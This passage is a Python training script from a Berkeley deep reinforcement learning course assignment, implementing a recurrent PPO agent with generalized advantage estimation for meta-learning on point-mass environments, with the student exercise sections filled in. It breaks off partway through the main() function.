train_policy.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
Adapted for use in CS294-112 Fall 2018 HW5 by Kate Rakelly and Michael Chang
"""
import numpy as np
import pdb
import random
import pickle
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
from tensorflow.python import debug as tf_debug
from replay_buffer import ReplayBuffer, PPOReplayBuffer
from point_mass import PointEnv
from point_mass_observed import ObservedPointEnv
#============================================================================================#
# Utilities
#============================================================================================#
def minimize_and_clip(optimizer, objective, var_list, clip_val=10):
"""
minimizes `objective` using `optimizer` w.r.t. variables in
`var_list`, while ensuring the norm of the gradient for each
variable is clipped to `clip_val`
"""
gradients = optimizer.compute_gradients(objective, var_list=var_list)
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, clip_val), var)
return optimizer.apply_gradients(gradients)
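# Usage sketch for minimize_and_clip (illustrative, not part of the original assignment;
# `loss` and `weights` below are hypothetical names for an existing scalar loss tensor
# and a list of trainable variables):
#   opt = tf.train.AdamOptimizer(1e-3)
#   train_op = minimize_and_clip(opt, loss, var_list=weights, clip_val=40)
# Note that each variable's gradient is clipped to norm `clip_val` individually
# (per-variable tf.clip_by_norm), rather than clipping the global norm of all gradients.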
def build_mlp(x, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None, regularizer=None):
"""
builds a feedforward neural network
arguments:
x: placeholder variable for the state (batch_size, input_size)
regularizer: regularization for weights
(see `build_policy()` for rest)
returns:
output placeholder of the network (the result of a forward pass)
"""
i = 0
for i in range(n_layers):
x = tf.layers.dense(inputs=x,units=size, activation=activation, name='fc{}'.format(i), kernel_regularizer=regularizer, bias_regularizer=regularizer)
x = tf.layers.dense(inputs=x, units=output_size, activation=output_activation, name='fc{}'.format(i + 1), kernel_regularizer=regularizer, bias_regularizer=regularizer)
return x
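# Usage sketch for build_mlp (illustrative; `obs_ph` and `ac_dim` are hypothetical names
# for a (batch_size, ob_dim) float placeholder and the action dimension):
#   with tf.variable_scope('example_mlp'):
#       logits = build_mlp(obs_ph, output_size=ac_dim, scope='example_mlp', n_layers=2, size=64)
# With n_layers=2 this creates tanh hidden layers fc0 and fc1 of width 64 and a linear
# output layer fc2 of width ac_dim. The `scope` argument is not used inside build_mlp
# itself; callers such as build_policy() open the variable scope around the call.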
def build_rnn(x, h, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None, regularizer=None):
"""
builds a gated recurrent neural network
inputs are first embedded by an MLP then passed to a GRU cell
make MLP layers with `size` number of units
make the GRU with `output_size` number of units
use `activation` as the activation function for both MLP and GRU
arguments:
(see `build_policy()`)
hint: use `build_mlp()`
"""
#====================================================================================#
# ----------PROBLEM 2----------
#====================================================================================#
# YOUR CODE HERE
# x = tf.reshape(x, [-1, x.shape[1]*x.shape[2]])
encoded = build_mlp(x, size, scope, n_layers, size, activation=activation, output_activation=output_activation, regularizer=regularizer)
cell = tf.nn.rnn_cell.GRUCell(output_size, activation=activation, reuse = tf.AUTO_REUSE)
for i in range(encoded.shape[1]):
output, h = cell(encoded[:,i,:],h)
return output, h
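# Note: the GRU above is unrolled manually over the `history` axis, feeding
# encoded[:, i, :] at each step and threading the hidden state `h` through.
# A functionally similar alternative (a sketch, not tested against this code) would be:
#   cell = tf.nn.rnn_cell.GRUCell(output_size, activation=activation)
#   outputs, h = tf.nn.dynamic_rnn(cell, encoded, initial_state=h)
#   output = outputs[:, -1, :]  # last timestep, matching the manual loop's return value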
def build_policy(x, h, output_size, scope, n_layers, size, gru_size, recurrent=True, activation=tf.tanh, output_activation=None):
"""
build recurrent policy
arguments:
x: placeholder variable for the input, which has dimension (batch_size, history, input_size)
h: placeholder variable for the hidden state, which has dimension (batch_size, gru_size)
output_size: size of the output layer, same as action dimension
scope: variable scope of the network
n_layers: number of hidden layers (not counting recurrent units)
size: dimension of the hidden layer in the encoder
gru_size: dimension of the recurrent hidden state if there is one
recurrent: if the network should be recurrent or feedforward
activation: activation of the hidden layers
output_activation: activation of the output layer
returns:
output placeholder of the network (the result of a forward pass)
n.b. we predict both the mean and std of the Gaussian policy, and we don't want the std to start off too large;
initialize the last layer of the policy with a Gaussian init of mean 0 and std 0.01
"""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if recurrent:
x, h = build_rnn(x, h, gru_size, scope, n_layers, size, activation=activation, output_activation=activation)
else:
x = tf.reshape(x, (-1, x.get_shape()[1]*x.get_shape()[2]))
x = build_mlp(x, gru_size, scope, n_layers + 1, size, activation=activation, output_activation=activation)
x = tf.layers.dense(x, output_size, activation=output_activation, kernel_initializer=tf.initializers.truncated_normal(mean=0.0, stddev=0.01), bias_initializer=tf.zeros_initializer(), name='decoder')
return x, h
def build_critic(x, h, output_size, scope, n_layers, size, gru_size, recurrent=True, activation=tf.tanh, output_activation=None, regularizer=None):
"""
build recurrent critic
arguments:
regularizer: regularization for weights
(see `build_policy()` for rest)
n.b. the policy and critic should not share weights
"""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if recurrent:
x, h = build_rnn(x, h, gru_size, scope, n_layers, size, activation=activation, output_activation=output_activation, regularizer=regularizer)
else:
x = tf.reshape(x, (-1, x.get_shape()[1]*x.get_shape()[2]))
x = build_mlp(x, gru_size, scope, n_layers + 1, size, activation=activation, output_activation=activation, regularizer=regularizer)
x = tf.layers.dense(x, output_size, activation=output_activation, name='decoder', kernel_regularizer=regularizer, bias_regularizer=regularizer)
return x
def pathlength(path):
return len(path["reward"])
def discounted_return(reward, gamma):
discounts = gamma**np.arange(len(reward))
return sum(discounts * reward)
def discount_cumsum(x, discount):
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
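# discount_cumsum computes y[t] = sum_{k >= t} discount**(k - t) * x[k] by running an
# IIR filter over the reversed sequence. A plain-loop equivalent (illustrative only):
#   def discount_cumsum_naive(x, discount):
#       out, running = np.zeros(len(x)), 0.0
#       for t in reversed(range(len(x))):
#           running = x[t] + discount * running
#           out[t] = running
#       return out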
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args, debug, gpu):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.task_dim = computation_graph_args['task_dim']
self.reward_dim = 1
self.terminal_dim = 1
self.meta_ob_dim = self.ob_dim + self.ac_dim + self.reward_dim + self.terminal_dim
self.scope = 'continuous_logits'
self.size = computation_graph_args['size']
self.gru_size = computation_graph_args['gru_size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.history = computation_graph_args['history']
self.num_value_iters = computation_graph_args['num_value_iters']
self.l2reg = computation_graph_args['l2reg']
self.recurrent = computation_graph_args['recurrent']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.nn_critic = estimate_return_args['nn_critic']
self.normalize_advantages = estimate_return_args['normalize_advantages']
self.replay_buffer = ReplayBuffer(100000, [self.history, self.meta_ob_dim], [self.ac_dim], self.gru_size, self.task_dim)
self.val_replay_buffer = ReplayBuffer(100000, [self.history, self.meta_ob_dim], [self.ac_dim], self.gru_size, self.task_dim)
self.debug = debug
self.gpu = gpu
def init_tf_sess(self):
gpu_options = tf.GPUOptions(allow_growth=True,visible_device_list=self.gpu)
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1, gpu_options=gpu_options)
self.sess = tf.Session(config=tf_config)
if self.debug:
self.sess = tf_debug.LocalCLIDebugWrapperSession(self.sess)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
placeholders for batch observations / actions / advantages in the policy gradient
loss function.
see Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for meta-observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
sy_hidden: placeholder for RNN hidden state
(PPO stuff)
sy_lp_n: placeholder for pre-computed log-probs
sy_fixed_lp_n: placeholder for pre-computed old log-probs
"""
sy_ob_no = tf.placeholder(shape=[None, self.history, self.meta_ob_dim], name="ob", dtype=tf.float32)
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
sy_hidden = tf.placeholder(shape=[None, self.gru_size], name="hidden", dtype=tf.float32)
sy_lp_n = tf.placeholder(shape=[None], name="logprob", dtype=tf.float32)
sy_fixed_lp_n = tf.placeholder(shape=[None], name="fixed_logprob", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n, sy_hidden, sy_lp_n, sy_fixed_lp_n
def policy_forward_pass(self, sy_ob_no, sy_hidden):
"""
constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.history, self.meta_ob_dim)
sy_hidden: (batch_size, self.gru_size)
returns:
the parameters of the policy.
the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
"""
# ac_dim * 2 because we predict both mean and std
sy_policy_params, sy_hidden = build_policy(sy_ob_no, sy_hidden, self.ac_dim*2, self.scope, n_layers=self.n_layers, size=self.size, gru_size=self.gru_size, recurrent=self.recurrent)
return (sy_policy_params, sy_hidden)
def sample_action(self, policy_parameters):
"""
constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
(mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
returns:
sy_sampled_ac:
(batch_size, self.ac_dim)
"""
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean), 0, 1)
return sy_sampled_ac
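# The sampling above is the reparameterization a = mean + exp(log_std) * eps with
# eps ~ N(0, I). An equivalent formulation using tensorflow_probability (already
# imported as tfp in this file) would be, as a sketch:
#   dist = tfp.distributions.MultivariateNormalDiag(loc=sy_mean, scale_diag=tf.exp(sy_logstd))
#   sy_sampled_ac = dist.sample()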
def get_log_prob(self, policy_parameters, sy_ac_na):
"""
constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
(mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_lp_n: (batch_size)
"""
sy_mean, sy_logstd = policy_parameters
sy_lp_n = tfp.distributions.MultivariateNormalDiag(
loc=sy_mean, scale_diag=tf.exp(sy_logstd)).log_prob(sy_ac_na)
return sy_lp_n
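# For a diagonal Gaussian the log-probability used above expands to
#   log p(a) = -0.5 * sum_i ((a_i - mu_i) / exp(log_std_i))**2
#              - sum_i log_std_i - 0.5 * ac_dim * log(2 * pi)
# A hand-rolled TF equivalent (illustrative sketch only):
#   z = (sy_ac_na - sy_mean) / tf.exp(sy_logstd)
#   sy_lp_n = (-0.5 * tf.reduce_sum(tf.square(z), axis=1)
#              - tf.reduce_sum(sy_logstd, axis=1)
#              - 0.5 * self.ac_dim * np.log(2 * np.pi))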
def build_computation_graph(self):
"""
notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch size /n/, observation dim)
_na - this tensor should have shape (batch size /n/, action dim)
_n - this tensor should have shape (batch size /n/)
Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_lp_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n, self.sy_hidden, self.sy_lp_n, self.sy_fixed_lp_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
policy_outputs = self.policy_forward_pass(self.sy_ob_no, self.sy_hidden)
self.policy_parameters = policy_outputs[:-1]
# unpack mean and variance
self.policy_parameters = tf.split(self.policy_parameters[0], 2, axis=1)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_lp_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
# PPO critic update
critic_regularizer = tf.contrib.layers.l2_regularizer(1e-3) if self.l2reg else None
self.critic_prediction = tf.squeeze(build_critic(self.sy_ob_no, self.sy_hidden, 1, 'critic_network', n_layers=self.n_layers, size=self.size, gru_size=self.gru_size, recurrent=self.recurrent, regularizer=critic_regularizer))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_weights = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='critic_network')
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
# PPO actor update
self.sy_fixed_log_prob_n = tf.placeholder(shape=[None], name="fixed_log_prob", dtype=tf.float32)
self.policy_surr_loss = self.ppo_loss(self.sy_lp_n, self.sy_fixed_lp_n, self.sy_adv_n)
self.policy_weights = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.scope)
optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.policy_update_op = minimize_and_clip(optimizer, self.policy_surr_loss, var_list=self.policy_weights, clip_val=40)
def sample_trajectories(self, itr, env, min_timesteps, is_evaluation=False):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
stats = []
while True:
animate_this_episode=(len(stats)==0 and (itr % 10 == 0) and self.animate)
steps, s = self.sample_trajectory(env, animate_this_episode, is_evaluation=is_evaluation)
stats += s
timesteps_this_batch += steps
if timesteps_this_batch > min_timesteps:
break
return stats, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode, is_evaluation):
"""
sample a task, then sample trajectories from that task until either
max(self.history, self.max_path_length) timesteps have been sampled
construct meta-observations by concatenating (s, a, r, d) into one vector
inputs to the policy should have the shape (batch_size, self.history, self.meta_ob_dim)
zero pad the input to maintain a consistent input shape
add the entire input as observation to the replay buffer, along with a, r, d
samples will be drawn from the replay buffer to update the policy
arguments:
env: the env to sample trajectories from
animate_this_episode: if True then render
is_evaluation: whether this is an evaluation rollout (True) or a training rollout (False)
"""
env.reset_task(is_evaluation=is_evaluation)
stats = []
#====================================================================================#
# ----------PROBLEM 1----------
#====================================================================================#
ep_steps = 0
steps = 0
num_samples = max(self.history, self.max_path_length + 1)
meta_obs = np.zeros((num_samples + self.history + 1, self.meta_ob_dim))
rewards = []
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
if ep_steps == 0:
ob = env.reset()
# first meta ob has only the observation
# set a, r, d to zero, construct first meta observation in meta_obs
# YOUR CODE HERE
a = np.zeros((self.ac_dim,), dtype=np.float32)
r = np.zeros((self.reward_dim,), dtype=np.float32)
d = np.zeros((self.terminal_dim,), dtype=np.float32)
meta_obs[ep_steps + self.history - 1,:] = np.concatenate([ob, a, r, d], axis=0)
steps += 1
# index into the meta_obs array to get the window that ends with the current timestep
# please name the windowed observation `in_` for compatibility with the code that adds to the replay buffer (lines 418, 420)
# YOUR CODE HERE
in_ = np.expand_dims(meta_obs[ep_steps:(ep_steps + self.history),:], axis=0)
hidden = np.zeros((1, self.gru_size), dtype=np.float32)
# get action from the policy
# YOUR CODE HERE
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: in_, self.sy_hidden: hidden})
ac = ac[0]
# step the environment
# YOUR CODE HERE
ob, rew, done, _ = env.step(ac)
ep_steps += 1
rew = np.array([rew], dtype=np.float32)
done = bool(done) or ep_steps == self.max_path_length
# construct the meta-observation and add it to meta_obs
# YOUR CODE HERE
meta_obs[ep_steps + self.history - 1, :] = np.concatenate( [ob, ac, rew, np.array([done], dtype=np.float32)], axis=0)
rewards.append(rew)
steps += 1
# add sample to replay buffer
if is_evaluation:
self.val_replay_buffer.add_sample(in_, ac, rew, done, hidden, env._goal)
else:
self.replay_buffer.add_sample(in_, ac, rew, done, hidden, env._goal)
# start new episode
if done:
# compute stats over trajectory
s = dict()
s['rewards']= rewards[-ep_steps:]
s['ep_len'] = ep_steps
stats.append(s)
ep_steps = 0
if steps >= num_samples:
break
return steps, stats
def compute_advantage(self, ob_no, re_n, hidden, masks, tau=0.95):
"""
computes generalized advantage estimation (GAE).
arguments:
ob_no: (bsize, history, ob_dim)
re_n: (bsize,)
hidden: (bsize, gru_size)
masks: (bsize,)
tau: scalar
output:
advantages: (bsize,)
returns: (bsize,)
requires:
self.gamma
"""
bsize = len(re_n)
rewards = np.squeeze(re_n)
masks = np.squeeze(masks)
values = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: ob_no, self.sy_hidden: hidden})[:,None]
gamma = self.gamma
assert rewards.shape == masks.shape == (bsize,)
assert values.shape == (bsize, 1)
bsize = len(rewards)
returns = np.empty((bsize,))
deltas = np.empty((bsize,))
advantages = np.empty((bsize,))
prev_return = 0
prev_value = 0
prev_advantage = 0
for i in reversed(range(bsize)):
returns[i] = rewards[i] + gamma * prev_return * masks[i]
deltas[i] = rewards[i] + gamma * prev_value * masks[i] - values[i]
advantages[i] = deltas[i] + gamma * tau * prev_advantage * masks[i]
prev_return = returns[i]
prev_value = values[i]
prev_advantage = advantages[i]
advantages = (advantages - np.mean(advantages, axis=0)) / np.std(advantages, axis=0)
return advantages, returns
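# The backward recursion above implements GAE(gamma, tau):
#   delta_t = r_t + gamma * V(s_{t+1}) * mask_t - V(s_t)
#   A_t     = delta_t + gamma * tau * mask_t * A_{t+1}
# together with the discounted return target R_t = r_t + gamma * mask_t * R_{t+1},
# where mask_t = 0 at episode boundaries so neither returns nor advantages leak
# across episodes. The advantages are then standardized before use in the PPO loss.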
def estimate_return(self, ob_no, re_n, hidden, masks):
"""
estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, history, meta_obs_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
hidden: hidden state of recurrent policy
masks: terminal masks
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
adv_n, q_n = self.compute_advantage(ob_no, re_n, hidden, masks)
return q_n, adv_n
def update_parameters(self, ob_no, hidden, ac_na, fixed_log_probs, q_n, adv_n):
"""
update the parameters of the policy and the critic,
with PPO update
arguments:
ob_no: (minibsize, history, meta_obs_dim)
hidden: shape: (minibsize, self.gru_size)
ac_na: (minibsize)
fixed_log_probs: (minibsize)
adv_n: shape: (minibsize)
q_n: shape: (sum_of_path_lengths)
returns:
nothing
"""
self.update_critic(ob_no, hidden, q_n)
self.update_policy(ob_no, hidden, ac_na, fixed_log_probs, adv_n)
def update_critic(self, ob_no, hidden, q_n):
"""
given:
self.num_value_iters
self.l2reg
arguments:
ob_no: (minibsize, history, meta_obs_dim)
hidden: (minibsize, self.gru_size)
q_n: (minibsize)
requires:
self.num_value_iters
"""
target_n = (q_n - np.mean(q_n))/(np.std(q_n)+1e-8)
for k in range(self.num_value_iters):
critic_loss, _ = self.sess.run(
[self.critic_loss, self.critic_update_op],
feed_dict={self.sy_target_n: target_n, self.sy_ob_no: ob_no, self.sy_hidden: hidden})
return critic_loss
def update_policy(self, ob_no, hidden, ac_na, fixed_log_probs, advantages):
'''
arguments:
fixed_log_probs: (minibsize)
advantages: (minibsize)
hidden: (minibsize, self.gru_size)
'''
policy_surr_loss, _ = self.sess.run(
[self.policy_surr_loss, self.policy_update_op],
feed_dict={self.sy_ob_no: ob_no, self.sy_hidden: hidden, self.sy_ac_na: ac_na, self.sy_fixed_lp_n: fixed_log_probs, self.sy_adv_n: advantages})
return policy_surr_loss
def ppo_loss(self, log_probs, fixed_log_probs, advantages, clip_epsilon=0.1, entropy_coeff=1e-4):
"""
given:
clip_epsilon
arguments:
advantages (mini_bsize,)
states (mini_bsize,)
actions (mini_bsize,)
fixed_log_probs (mini_bsize,)
intermediate results:
states, actions --> log_probs
log_probs, fixed_log_probs --> ratio
advantages, ratio --> surr1
ratio, clip_epsilon, advantages --> surr2
surr1, surr2 --> policy_surr_loss
"""
ratio = tf.exp(log_probs - fixed_log_probs)
surr1 = ratio * advantages
surr2 = tf.clip_by_value(ratio, clip_value_min=1.0-clip_epsilon, clip_value_max=1.0+clip_epsilon) * advantages
policy_surr_loss = -tf.reduce_mean(tf.minimum(surr1, surr2))
probs = tf.exp(log_probs)
entropy = tf.reduce_sum(-(log_probs * probs))
policy_surr_loss -= entropy_coeff * entropy
return policy_surr_loss
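# Worked numbers for the clipped surrogate above (clip_epsilon = 0.1):
#   if A > 0 and ratio = 1.3, surr1 = 1.3*A but surr2 = 1.1*A, so min(surr1, surr2)
#   = 1.1*A and there is no benefit to pushing the ratio past 1 + epsilon;
#   if A < 0 and ratio = 0.7, min(0.7*A, 0.9*A) = 0.9*A, which no longer depends on
#   the ratio, so there is no incentive to push it below 1 - epsilon.
# The final term subtracts entropy_coeff times a simple entropy estimate computed
# from the log-probs of the sampled actions, encouraging exploration.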
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
mini_batch_size,
max_path_length,
learning_rate,
num_ppo_updates,
num_value_iters,
animate,
logdir,
normalize_advantages,
nn_critic,
seed,
n_layers,
size,
gru_size,
history,
num_tasks,
l2reg,
recurrent,
debug,
gpu,
disjoint_sets,
delta
):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
envs = {'pm': PointEnv,
'pm-obs': ObservedPointEnv,
}
if env_name == 'pm':
env = envs[env_name](num_tasks, disjoint_sets, delta)
else:
env = envs[env_name](num_tasks)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.shape[0]
task_dim = len(env._goal) # rude, sorry
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'task_dim': task_dim,
'size': size,
'gru_size': gru_size,
'learning_rate': learning_rate,
'history': history,
'num_value_iters': num_value_iters,
'l2reg': l2reg,
'recurrent': recurrent,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'nn_critic': nn_critic,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args, debug, gpu)
# build computation graph
agent.build_computation_graph()
def num_params():
all_vars = tf.trainable_variables()
params = 0
for s_var in all_vars:
s_shape = 1
for i in s_var.shape:
s_shape *= i
params += s_shape
return params
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
def unpack_sample(data):
'''
unpack a sample from the replay buffer
'''
ob = data["observations"]
ac = data["actions"]
re = data["rewards"]
hi = data["hiddens"]
ma = 1 - data["terminals"]
return ob, ac, re, hi, ma
# construct PPO replay buffer, perhaps rude to do outside the agent
ppo_buffer = PPOReplayBuffer(agent.replay_buffer)
total_timesteps = 0
for itr in range(n_iter):
# for PPO: flush the replay buffer!
ppo_buffer.flush()
# sample trajectories to fill agent's replay buffer
print("********** Iteration %i ************"%itr)
stats = []
for _ in range(num_tasks):
s, timesteps_this_batch = agent.sample_trajectories(itr, env, min_timesteps_per_batch)
total_timesteps += timesteps_this_batch
stats += s
# compute the log probs, advantages, and returns for all data in agent's buffer
# store in ppo buffer for use in multiple ppo updates
# TODO: should move inside the agent probably
data = agent.replay_buffer.all_batch()
ob_no, ac_na, re_n, hidden, masks = unpack_sample(data)
fixed_log_probs = agent.sess.run(agent.sy_lp_n,
feed_dict={agent.sy_ob_no: ob_no, agent.sy_hidden: hidden, agent.sy_ac_na: ac_na})
q_n, adv_n = agent.estimate_return(ob_no, re_n, hidden, masks)
ppo_buffer.add_samples(fixed_log_probs, adv_n, q_n)
# update with mini-batches sampled from ppo buffer
for _ in range(num_ppo_updates):
data = ppo_buffer.random_batch(mini_batch_size)
ob_no, ac_na, re_n, hidden, masks = unpack_sample(data)
fixed_log_probs = data["log_probs"]
adv_n = data["advantages"]
q_n = data["returns"]
log_probs = agent.sess.run(agent.sy_lp_n,
feed_dict={agent.sy_ob_no: ob_no, agent.sy_hidden: hidden, agent.sy_ac_na: ac_na})
agent.update_parameters(ob_no, hidden, ac_na, fixed_log_probs, q_n, adv_n)
# compute validation statistics
print('Validating...')
val_stats = []
for _ in range(num_tasks):
vs, timesteps_this_batch = agent.sample_trajectories(itr, env, min_timesteps_per_batch // 10, is_evaluation=True)
val_stats += vs
# save trajectories for viz
with open("output/{}-epoch{}.pkl".format(exp_name, itr), 'wb') as f:
pickle.dump(agent.val_replay_buffer.all_batch(), f, pickle.HIGHEST_PROTOCOL)
agent.val_replay_buffer.flush()
# Log TRAIN diagnostics
returns = [sum(s["rewards"]) for s in stats]
final_rewards = [s["rewards"][-1] for s in stats]
ep_lengths = [s['ep_len'] for s in stats]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("FinalReward", np.mean(final_rewards))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
# Log VAL diagnostics
val_returns = [sum(s["rewards"]) for s in val_stats]
val_final_rewards = [s["rewards"][-1] for s in val_stats]
logz.log_tabular("ValAverageReturn", np.mean(val_returns))
logz.log_tabular("ValFinalReward", np.mean(val_final_rewards))
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='exp')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=0.99)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-pb', type=int, default=10000)
parser.add_argument('--mini_batch_size', '-mpb', type=int, default=64)
parser.add_argument('--num_tasks', '-nt', type=int, default=1)
parser.add_argument('--ep_len', '-ep', type=int, default=20)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-4)
parser.add_argument('--num_value_iters', '-nvu', type=int, default=1)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_critic', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=64)
parser.add_argument('--gru_size', '-rs', type=int, default=32)
parser.add_argument('--history', '-ho', type=int, default=1)
parser.add_argument('--l2reg', '-reg', action='store_true')
parser.add_argument('--recurrent', '-rec', action='store_true')
parser.add_argument('--single_process', action='store_true')
parser.add_argument('--debug', action='store_true')
parser.add_argument('--visible_gpus', type=str, default='0')
parser.add_argument('--disjoint_sets', action='store_true')
parser.add_argument('--delta', type=int, default=1)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size // args.num_tasks,
mini_batch_size=args.mini_batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_ppo_updates=(args.batch_size // args.mini_batch_size) * 5,
num_value_iters=args.num_value_iters,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_critic=args.nn_critic,
seed=seed,
n_layers=args.n_layers,
size=args.size,
gru_size=args.gru_size,
history=args.history,
num_tasks=args.num_tasks,
l2reg=args.l2reg,
recurrent=args.recurrent,
debug=args.debug,
gpu=args.visible_gpus,
disjoint_sets = args.disjoint_sets,
delta = args.delta
)
if args.single_process or args.debug:
train_func()
else:
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
